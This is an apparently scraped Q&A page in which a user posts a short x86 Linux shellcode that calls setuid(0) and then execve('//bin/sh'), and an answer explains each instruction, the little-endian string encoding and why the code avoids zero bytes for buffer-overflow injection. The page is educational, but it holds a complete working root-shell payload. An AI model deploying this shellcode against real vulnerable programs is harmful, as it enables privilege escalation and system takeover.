How can I explain the behavior of the following shellcode exploit?

Tags:

This is a shellcode to exploit the bufferoverflow vulnerability. It sets the setuid(0) and spawns a shell using execve(). Below is the way I have interpreted it:

xor    %ebx,%ebx       ; Xoring to make ebx value 0
lea    0x17(%ebx),%eax ; adds 23 to 0 and loads effective addr to eax. for setuid()
int    $0x80           ; interrupt
push   %ebx            ; push ebx
push   $0x68732f6e     ; push address // why this address only????
push   $0x69622f2f     ; push address // same question
mov    %esp,%ebx
push   %eax
push   %ebx
mov    %esp,%ecx
cltd                   ; mov execve sys call into al
mov    $0xb,%al
int    $0x80           ; interrupt

Can anyone explain the entire steps clearly?

294

asked Nov 08 '10 18:11

Vinod K

1 Answers

int is the opcode for triggering a software interrupt. Software interrupts are numbered (from 0 to 255) and handled by the kernel. On Linux systems, interrupt 128 (0x80) is the conventional entry point for system calls. The kernel expects the system call arguments in the registers; in particular, the %eax register identifies which system call we are talking about.

Set %ebx to 0
Compute %ebx+23 and store the result in %eax (the opcode is lea as "load effective address" but not memory access is involved; this is just a devious way of making an addition).
System call. %eax contains 23, which means that the system call is setuid. That system call uses one argument (the target UID), to be found in %ebx, which conveniently contains 0 at that point (it was set in the first instruction). Note: upon return, registers are unmodified, except for %eax which contains the returned value of the system call, normally 0 (if the call was a success).
Push %ebx on the stack (which is still 0).
Push $0x68732f6e on the stack.
Push $0x69622f2f on the stack. Since the stack grows "down" and since the x86 processors use little endian encoding, the effect of instructions 4 to 6 is that %esp (the stack pointer) now points at a sequence of twelve bytes, of values 2f 2f 62 69 6e 2f 73 68 00 00 00 00 (in hexadecimal). That's the encoding of the "//bin/sh" string (with a terminating zero, and three extra zeros afterwards).
Move %esp to %ebx. Now %ebx contains a pointer to the "//bin/sh" string which was built above.
Push %eax on the stack (%eax is 0 at that point, it is the returned status from setuid).
Push %ebx on the stack (pointer to "//bin/sh"). Instructions 8 and 9 build on the stack an array of two pointers, the first being the pointer to "//bin/sh" and the second a NULL pointer. That array is what the execve system call will use as second argument.
Move %esp to %ecx. Now %ecx points to the array built with instructions 8 and 9.
Sign-extend %eax into %edx:%eax. cltd is the AT&T syntax for what the Intel documentations call cdq. Since %eax is zero at that point, this sets %edx to zero too.
Set %al (the least significant byte of %eax) to 11. Since %eax was zero, the whole value of %eax is now 11.
System call. The value of %eax (11) identifies the system call as execve. execve expects three arguments, in %ebx (pointer to a string naming the file to execute), %ecx (pointer to an array of pointers to strings, which are the program arguments, the first one being a copy of the program name, to be used by the invoked program itself) and %edx (pointer to an array of pointers to strings, which are the environment variables; Linux tolerates that value to be NULL, for an empty environment), respectively.

So the code first calls setuid(0), then calls execve("//bin/sh", x, 0) where x points to an array of two pointers, first one being a pointer to "//bin/sh", while the other is NULL.

This code is quite convoluted because it wants to avoid zeros: when assembled into binary opcodes, the sequence of instruction uses only non-zero bytes. For instance, if the 12th instruction had been movl $0xb,%eax (setting the whole of %eax to 11), then the binary representation of that opcode would have contained three bytes of value 0. The lack of zero makes that sequence usable as the contents of a zero-terminated C string. This is meant for attacking buggy programs through buffer overflows, of course.

116

answered Sep 28 '22 16:09

Thomas Pornin

Related questions
                            
                                stack segment and stack pointer in 8086
                            
                                How are all disk sectors iterated in assembly?
                            
                                Subtracting registers with an LEA instruction?
                            
                                How does this sqrt approximation inline assembly function work?
                            
                                What does this RSB instruction do?
                            
                                Do compilers usually use registers for their "intended" purpose?
                            
                                ADC instruction in asm
                            
                                Can an instruction be in two addressing modes at the same time?
                            
                                Why isn't my root directory being loaded? (FAT12)
                            
                                x86 Assembly: Data in the Text Section
                            
                                Modulo in 68K assembly
                            
                                Z80 assembly: How to add signed 8-bit value to 16-bit register?
                            
                                Pipeline on Registers calculation
                            
                                Creating A Boot Program in RISC-V
                            
                                Unresolved external symbol printf in Windows x64 Assembly Programming with NASM
                            
                                C++ What actually happens in assembly when you return a struct from a function?
                            
                                Why does int addition though pointers take one less x86 instruction than int multiplication through pointers?
                            
                                Cygwin: Assembly language development?
                            
                                Fast little-endian to big-endian conversion in ASM
                            
                                Z80 (TI-83+) stops working on CALL

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!

Donate Us With

How can I explain the behavior of the following shellcode exploit?

Tags:

x86

assembly

buffer-overflow

exploit

shellcode

Vinod K

People also ask

1 Answers

Thomas Pornin

Recent Activity

Donate For Us